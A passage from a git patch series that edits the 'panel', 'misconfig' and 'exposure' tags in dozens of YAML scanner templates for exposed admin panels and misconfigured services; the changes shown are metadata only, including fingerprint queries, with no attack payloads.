http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- http/misconfiguration/setup-github-enterprise.yaml | 2 +- http/misconfiguration/struts-ognl-console.yaml | 2 +- http/misconfiguration/tls-sni-proxy.yaml | 2 +- http/misconfiguration/unauth-fastvue-dashboard.yaml | 2 +- http/misconfiguration/zenphoto-sensitive-info.yaml | 2 +- 31 files changed, 31 insertions(+), 31 deletions(-) diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index bbe88039ae..69ab73299d 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fuzz,adminer,login,panel + tags: fuzz,adminer,login # <= 4.2.4 can have unauthenticated RCE via SQLite driver # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 2b7d52c7b9..ed8e7edf2d 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.favicon.hash:-1961736892 fofa-query: title="dzzoffice" - tags: dzzoffice,install,panel + tags: dzzoffice,install http: - method: GET diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml index 34e6f4eb49..ab38df9d2b 100644 --- a/http/exposed-panels/gryphon-login.yaml +++ b/http/exposed-panels/gryphon-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Gryphon" - tags: gryphon,router,panel + tags: gryphon,router http: - method: GET diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml index 21018323db..819b5008e5 100644 --- a/http/exposed-panels/laravel-filemanager.yaml +++ b/http/exposed-panels/laravel-filemanager.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: laravel,filemanager,fileupload,panel + tags: laravel,filemanager,fileupload metadata: max-request: 1 diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml index 0e57755c52..72bfec5eca 100644 --- a/http/exposed-panels/luci-login-detection.yaml +++ b/http/exposed-panels/luci-login-detection.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,panel + tags: login metadata: max-request: 1 diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml index f5d3f00eaa..f0a87b0513 100644 --- a/http/exposed-panels/openbmcs-detect.yaml +++ b/http/exposed-panels/openbmcs-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: openbmcs,detect,panel + tags: openbmcs,detect metadata: max-request: 1 diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml index d9bc051e69..53dd936588 100644 --- a/http/exposed-panels/opencpu-panel.yaml +++ b/http/exposed-panels/opencpu-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: opencpu,oss,panel + tags: opencpu,oss metadata: max-request: 1 diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index 7c2fa348dd..0447999ff6 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Login - SAP SuccessFactors" - tags: sap,detect,panel + tags: sap,detect http: - method: GET diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml index 58adb05ba2..d0fa6f52ba 100644 --- a/http/exposed-panels/server-backup-login.yaml +++ b/http/exposed-panels/server-backup-login.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,idera,edb + tags: paneil,idera,edb metadata: max-request: 1 diff --git a/http/misconfiguration/ampps-dirlisting.yaml b/http/misconfiguration/ampps-dirlisting.yaml index 32665d9fa5..8e5f9ae11f 100644 --- a/http/misconfiguration/ampps-dirlisting.yaml +++ b/http/misconfiguration/ampps-dirlisting.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: ampps,softaculous,misconfig + tags: panel,ampps,softaculous,misconfig metadata: max-request: 3 diff --git a/http/misconfiguration/apache/tomcat-pathnormalization.yaml b/http/misconfiguration/apache/tomcat-pathnormalization.yaml index 32f6799d93..50e48010cc 100644 --- a/http/misconfiguration/apache/tomcat-pathnormalization.yaml +++ b/http/misconfiguration/apache/tomcat-pathnormalization.yaml @@ -10,7 +10,7 @@ info: cvss-score: 0.0 cwe-id: CWE-200 reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: tomcat,apache,misconfig + tags: panel,tomcat,apache,misconfig metadata: max-request: 6 diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index 575d3490bb..b4b3125351 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Bootstrap Admin Template" - tags: bootstrap,misconfig + tags: bootstrap,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/command-api-explorer.yaml b/http/misconfiguration/command-api-explorer.yaml index 226da45cc3..b36d832462 100644 --- a/http/misconfiguration/command-api-explorer.yaml +++ b/http/misconfiguration/command-api-explorer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Command API Explorer" - tags: misconfig + tags: panel,misconfig http: - method: GET diff --git a/http/misconfiguration/deos-openview-admin.yaml b/http/misconfiguration/deos-openview-admin.yaml index 819d4383db..6d905b255b 100644 --- a/http/misconfiguration/deos-openview-admin.yaml +++ b/http/misconfiguration/deos-openview-admin.yaml @@ -10,7 +10,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-284 - tags: openview,disclosure,misconfig + tags: openview,disclosure,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 2c58bfa1a3..2cd78dde03 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: unauth,misconfig + tags: unauth,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-service-now.yaml b/http/misconfiguration/exposed-service-now.yaml index 37c81d2329..5b824e7385 100644 --- a/http/misconfiguration/exposed-service-now.yaml +++ b/http/misconfiguration/exposed-service-now.yaml @@ -8,7 +8,7 @@ info: reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ - tags: servicenow,misconfig + tags: servicenow metadata: max-request: 1 diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 58ec93617a..9eaed6424b 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: install,avideo,misconfig + tags: panel,install,avideo,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 75f192b16b..1a274b2ac5 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,installer,misconfig + tags: scada,circontrol,circarlife,setup,panel,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 707bbd8f94..6b469b7123 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: mcloud,misconfig + tags: panel,mcloud,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index d3e1fd2e30..3b035b14bf 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenShift Assisted Installer" - tags: openshift,cluster,misconfig + tags: panel,openshift,cluster,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index ba11b7cdee..df0e235c43 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true shodan-query: title:"Zenphoto install" - tags: zenphoto,setup,installer,misconfig + tags: panel,zenphoto,setup,installer http: - method: GET diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index 06e97392e4..c8d292ccbc 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"IoT vDME Simulator" - tags: misconfig + tags: misconfig,panel http: - method: GET diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml index 41b1f7bda5..277e829263 100644 --- a/http/misconfiguration/misconfigured-docker.yaml +++ b/http/misconfiguration/misconfigured-docker.yaml @@ -7,7 +7,7 @@ info: description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon. reference: - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html - tags: docker,unauth,devops,misconfig + tags: docker,unauth,devops metadata: max-request: 1 diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index 89b8fe06a7..09a80a8e7e 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: nomad,devops,hashicorp,misconfig + tags: nomad,devops,hashicorp,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index 41d83f9467..1341cc8055 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -17,7 +17,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OneinStack" - tags: misconfig,oneinstack + tags: misconfig,panel,oneinstack http: - method: GET diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index f80a6e6c35..87b5274549 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: pghero,misconfig + tags: panel,pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index fbed7d76b4..fe16ef1415 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: setup,github,misconfig + tags: panel,setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index 4d98416f7b..56d225cb00 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,misconfig + tags: apache,struts,ognl,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml index f3bf8e534a..5bb5eeee62 100644 --- a/http/misconfiguration/tls-sni-proxy.yaml +++ b/http/misconfiguration/tls-sni-proxy.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/ - https://www.bamsoftware.com/computers/sniproxy/ - tags: ssrf,oast,tls,sni,proxy,misconfig + tags: ssrf,oast,tls,sni,proxy metadata: max-request: 1 diff --git a/http/misconfiguration/unauth-fastvue-dashboard.yaml b/http/misconfiguration/unauth-fastvue-dashboard.yaml index 62f215ecdc..dba2300793 100644 --- a/http/misconfiguration/unauth-fastvue-dashboard.yaml +++ b/http/misconfiguration/unauth-fastvue-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1117549627 - tags: fastvue,unauth,misconfig + tags: panel,fastvue,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml index c15b8f0011..e71e09c154 100644 --- a/http/misconfiguration/zenphoto-sensitive-info.yaml +++ b/http/misconfiguration/zenphoto-sensitive-info.yaml @@ -5,7 +5,7 @@ info: author: qlkwej severity: medium description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure - tags: unauth,misconfig + tags: unauth metadata: max-request: 4 From e095c6063ef5ba4f762bb98cdebdde600d9337c1 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:40:59 -0700 Subject: [PATCH 218/609] Revert "remove exposure tag from misconfiguration templates" This reverts commit 3a815a58a1012203cb392d36bcf480e455f05471. --- http/misconfiguration/ace-admin-dashboard.yaml | 2 +- http/misconfiguration/aem/aem-crx-browser.yaml | 2 +- http/misconfiguration/aem/aem-crx-namespace.yaml | 2 +- http/misconfiguration/aem/aem-crx-search.yaml | 2 +- http/misconfiguration/aem/aem-disk-usage.yaml | 2 +- http/misconfiguration/aem/aem-explorer-nodetypes.yaml | 2 +- http/misconfiguration/aem/aem-external-link-checker.yaml | 2 +- http/misconfiguration/aem/aem-misc-admin.yaml | 2 +- http/misconfiguration/aem/aem-secrets.yaml | 2 +- http/misconfiguration/aem/aem-security-users.yaml | 2 +- http/misconfiguration/aem/aem-sling-userinfo.yaml | 2 +- http/misconfiguration/ampache-update-exposure.yaml | 2 +- http/misconfiguration/apache-drill-exposure.yaml | 2 +- http/misconfiguration/apache-struts-showcase.yaml | 2 +- http/misconfiguration/apache/kafka-manager-unauth.yaml | 2 +- http/misconfiguration/awstats-listing.yaml | 2 +- http/misconfiguration/blackbox-exporter-metrics.yaml | 2 +- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 +- http/misconfiguration/cadvisor-exposure.yaml | 2 +- http/misconfiguration/clockwork-dashboard-exposure.yaml | 2 +- http/misconfiguration/cloud-metadata.yaml | 2 +- http/misconfiguration/cobbler-exposed-directory.yaml | 2 +- http/misconfiguration/codemeter-webadmin.yaml | 2 +- http/misconfiguration/codis-dashboard.yaml | 2 +- http/misconfiguration/collectd-exporter-metrics.yaml | 2 +- http/misconfiguration/confluence-dashboard.yaml | 2 +- http/misconfiguration/corebos-htaccess.yaml | 2 +- http/misconfiguration/debug/bottle-debug.yaml | 2 +- http/misconfiguration/debug/flask-werkzeug-debug.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/docmosis-tornado-server.yaml | 2 +- http/misconfiguration/elastic-hd-dashboard.yaml | 2 +- http/misconfiguration/encompass-cm1-homepage.yaml | 2 +- http/misconfiguration/envoy-admin-exposure.yaml | 2 +- http/misconfiguration/espeasy-mega-exposure.yaml | 2 +- http/misconfiguration/esphome-dashboard.yaml | 2 +- http/misconfiguration/everything-listing.yaml | 2 +- http/misconfiguration/exposed-jquery-file-upload.yaml | 2 +- http/misconfiguration/exposed-kafdrop.yaml | 2 +- http/misconfiguration/front-page-misconfig.yaml | 2 +- http/misconfiguration/gitlab/gitlab-public-repos.yaml | 2 +- http/misconfiguration/gitlab/gitlab-public-snippets.yaml | 2 +- http/misconfiguration/global-traffic-statistics.yaml | 2 +- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 2 +- http/misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- http/misconfiguration/haproxy-exporter-metrics.yaml | 2 +- http/misconfiguration/healthchecks-ui-exposure.yaml | 2 +- http/misconfiguration/hfs-exposure.yaml | 2 +- http/misconfiguration/ibm-friendly-path-exposure.yaml | 2 +- http/misconfiguration/ibm-websphere-xml.yaml | 3 ++- http/misconfiguration/installer/acunetix-360-installer.yaml | 2 +- http/misconfiguration/installer/ampache-music-installer.yaml | 2 +- http/misconfiguration/installer/bagisto-installer.yaml | 2 +- http/misconfiguration/installer/binom-installer.yaml | 2 +- http/misconfiguration/installer/blesta-installer.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/cloudcenter-Installer.yaml | 2 +- http/misconfiguration/installer/codeigniter-installer.yaml | 2 +- http/misconfiguration/installer/concrete-installer.yaml | 2 +- http/misconfiguration/installer/contentify-installer.yaml | 2 +- http/misconfiguration/installer/dokuwiki-installer.yaml | 2 +- http/misconfiguration/installer/dolibarr-installer.yaml | 2 +- http/misconfiguration/installer/eshop-installer.yaml | 2 +- http/misconfiguration/installer/espeasy-installer.yaml | 2 +- http/misconfiguration/installer/facturascripts-installer.yaml | 2 +- http/misconfiguration/installer/geniusocean-installer.yaml | 2 +- http/misconfiguration/installer/getsimple-installation.yaml | 2 +- http/misconfiguration/installer/gogs-installer.yaml | 2 +- http/misconfiguration/installer/impresspages-installer.yaml | 2 +- http/misconfiguration/installer/lmszai-installer.yaml | 2 +- http/misconfiguration/installer/lychee-installer.yaml | 2 +- http/misconfiguration/installer/magento-installer.yaml | 2 +- http/misconfiguration/installer/magnolia-installer.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/moodle-installer.yaml | 2 +- http/misconfiguration/installer/nagiosxi-installer.yaml | 2 +- .../installer/netsparker-enterprise-installer.yaml | 2 +- http/misconfiguration/installer/nginx-auto-installer.yaml | 2 +- http/misconfiguration/installer/nodebb-installer.yaml | 2 +- http/misconfiguration/installer/openmage-install.yaml | 2 +- http/misconfiguration/installer/opensis-installer.yaml | 2 +- http/misconfiguration/installer/orangehrm-installer.yaml | 2 +- .../installer/owncloud-installer-exposure.yaml | 2 +- http/misconfiguration/installer/oxid-eshop-installer.yaml | 2 +- http/misconfiguration/installer/pagekit-installer.yaml | 2 +- http/misconfiguration/installer/permissions-installer.yaml | 2 +- http/misconfiguration/installer/phpbb-installer.yaml | 2 +- http/misconfiguration/installer/phpwind-installer.yaml | 2 +- http/misconfiguration/installer/pmm-installer.yaml | 2 +- http/misconfiguration/installer/prestashop-installer.yaml | 2 +- http/misconfiguration/installer/processwire-installer.yaml | 2 +- http/misconfiguration/installer/server-monitor-installer.yaml | 2 +- http/misconfiguration/installer/smf-installer.yaml | 2 +- http/misconfiguration/installer/sumowebtools-installer.yaml | 2 +- http/misconfiguration/installer/tasmota-install.yaml | 2 +- http/misconfiguration/installer/testrail-install.yaml | 2 +- http/misconfiguration/installer/turbo-website-installer.yaml | 2 +- http/misconfiguration/installer/unifi-wizard-install.yaml | 2 +- http/misconfiguration/installer/uvdesk-install.yaml | 2 +- http/misconfiguration/installer/vtiger-installer.yaml | 2 +- http/misconfiguration/installer/webasyst-installer.yaml | 2 +- http/misconfiguration/installer/webuzo-installer.yaml | 2 +- http/misconfiguration/iot-vdme-simulator.yaml | 2 +- http/misconfiguration/kubernetes/kube-state-metrics.yaml | 2 +- http/misconfiguration/kubernetes/kubernetes-metrics.yaml | 2 +- .../kubernetes/kubernetes-resource-report.yaml | 2 +- http/misconfiguration/libvirt-exporter-metrics.yaml | 2 +- http/misconfiguration/liferay/liferay-api.yaml | 2 +- http/misconfiguration/liferay/liferay-axis.yaml | 2 +- http/misconfiguration/liferay/liferay-jsonws.yaml | 2 +- http/misconfiguration/linktap-gateway-exposure.yaml | 2 +- http/misconfiguration/locust-exposure.yaml | 2 +- http/misconfiguration/lvm-exporter-metrics.yaml | 2 +- http/misconfiguration/mobiproxy-dashboard.yaml | 2 +- http/misconfiguration/moleculer-microservices.yaml | 2 +- http/misconfiguration/mongodb-exporter-metrics.yaml | 2 +- http/misconfiguration/mysqld-exporter-metrics.yaml | 2 +- http/misconfiguration/namedprocess-exporter-metrics.yaml | 2 +- http/misconfiguration/node-exporter-metrics.yaml | 2 +- http/misconfiguration/ntop-panel-exposed.yaml | 2 +- http/misconfiguration/oneinstack-control-center.yaml | 2 +- http/misconfiguration/pa11y-dashboard.yaml | 2 +- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- http/misconfiguration/phpmemcached-admin-panel.yaml | 2 +- http/misconfiguration/postgres-exporter-metrics.yaml | 2 +- http/misconfiguration/private-key-exposure.yaml | 2 +- http/misconfiguration/proxy/metadata-alibaba.yaml | 2 +- http/misconfiguration/proxy/metadata-aws.yaml | 2 ++ http/misconfiguration/proxy/metadata-azure.yaml | 2 +- http/misconfiguration/proxy/metadata-digitalocean.yaml | 2 +- http/misconfiguration/proxy/metadata-google.yaml | 2 +- http/misconfiguration/proxy/metadata-hetzner.yaml | 2 +- http/misconfiguration/proxy/metadata-openstack.yaml | 2 +- http/misconfiguration/proxy/metadata-oracle.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/misconfiguration/puppetdb-dashboard.yaml | 2 +- http/misconfiguration/python-metrics.yaml | 2 +- http/misconfiguration/questdb-console.yaml | 2 +- http/misconfiguration/rabbitmq-exporter-metrics.yaml | 2 +- http/misconfiguration/ray-dashboard.yaml | 2 +- http/misconfiguration/rekognition-image-validation.yaml | 2 +- http/misconfiguration/salesforce-aura.yaml | 2 +- http/misconfiguration/service-pwd.yaml | 2 +- http/misconfiguration/setup-github-enterprise.yaml | 2 +- http/misconfiguration/skycaiji-install.yaml | 2 +- http/misconfiguration/smarterstats-setup.yaml | 2 +- http/misconfiguration/sony-bravia-disclosure.yaml | 2 +- http/misconfiguration/spidercontrol-scada-server-info.yaml | 2 +- http/misconfiguration/springboot/spring-eureka.yaml | 2 +- http/misconfiguration/springboot/springboot-auditevents.yaml | 2 +- http/misconfiguration/springboot/springboot-autoconfig.yaml | 2 +- http/misconfiguration/springboot/springboot-beans.yaml | 2 +- http/misconfiguration/springboot/springboot-caches.yaml | 2 +- http/misconfiguration/springboot/springboot-conditions.yaml | 2 +- http/misconfiguration/springboot/springboot-configprops.yaml | 2 +- http/misconfiguration/springboot/springboot-dump.yaml | 2 +- http/misconfiguration/springboot/springboot-env.yaml | 2 +- http/misconfiguration/springboot/springboot-features.yaml | 2 +- http/misconfiguration/springboot/springboot-flyway.yaml | 2 +- http/misconfiguration/springboot/springboot-gateway.yaml | 2 +- http/misconfiguration/springboot/springboot-health.yaml | 2 +- http/misconfiguration/springboot/springboot-heapdump.yaml | 1 + http/misconfiguration/springboot/springboot-httptrace.yaml | 2 +- http/misconfiguration/springboot/springboot-jolokia.yaml | 2 +- http/misconfiguration/springboot/springboot-liquidbase.yaml | 2 +- http/misconfiguration/springboot/springboot-logfile.yaml | 2 +- http/misconfiguration/springboot/springboot-loggerconfig.yaml | 2 +- http/misconfiguration/springboot/springboot-loggers.yaml | 2 +- http/misconfiguration/springboot/springboot-mappings.yaml | 2 +- http/misconfiguration/springboot/springboot-metrics.yaml | 2 +- .../misconfiguration/springboot/springboot-scheduledtasks.yaml | 2 +- http/misconfiguration/springboot/springboot-status.yaml | 2 +- http/misconfiguration/springboot/springboot-trace.yaml | 2 +- http/misconfiguration/sql-server-report-viewer.yaml | 2 +- http/misconfiguration/syncthing-dashboard.yaml | 2 +- http/misconfiguration/system-properties-exposure.yaml | 2 +- http/misconfiguration/tasmota-config-webui.yaml | 2 +- http/misconfiguration/thinkphp-errors.yaml | 2 +- http/misconfiguration/tomcat-cookie-exposed.yaml | 2 +- http/misconfiguration/transmission-dashboard.yaml | 2 +- http/misconfiguration/typo3-composer.yaml | 2 +- http/misconfiguration/unauth-apache-kafka-ui.yaml | 2 +- http/misconfiguration/unauth-axyom-network-manager.yaml | 2 +- http/misconfiguration/unauth-kubecost.yaml | 2 +- http/misconfiguration/unauth-wavink-panel.yaml | 2 +- http/misconfiguration/unauthenticated-glances.yaml | 2 +- http/misconfiguration/viewpoint-system-status.yaml | 2 +- http/misconfiguration/wamp-server-configuration.yaml | 2 +- http/misconfiguration/webdav-enabled.yaml | 2 +- 191 files changed, 193 insertions(+), 189 deletions(-) diff --git a/http/misconfiguration/ace-admin-dashboard.yaml b/http/misconfiguration/ace-admin-dashboard.yaml index 798d0fde2f..bf496b44b7 100644 --- a/http/misconfiguration/ace-admin-dashboard.yaml +++ b/http/misconfiguration/ace-admin-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Ace Admin" - tags: misconfig,aceadmin + tags: misconfig,exposure,aceadmin http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-browser.yaml b/http/misconfiguration/aem/aem-crx-browser.yaml index 14962133f7..2c13bb3ea9 100644 --- a/http/misconfiguration/aem/aem-crx-browser.yaml +++ b/http/misconfiguration/aem/aem-crx-browser.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index 55912c04af..c7b3fc1457 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: exposure,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index e8a805a256..72c2066ee0 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index f11174a124..628a753941 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index 9940c91147..da3d82c298 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 2dbfab58b5..316cb3e06b 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ 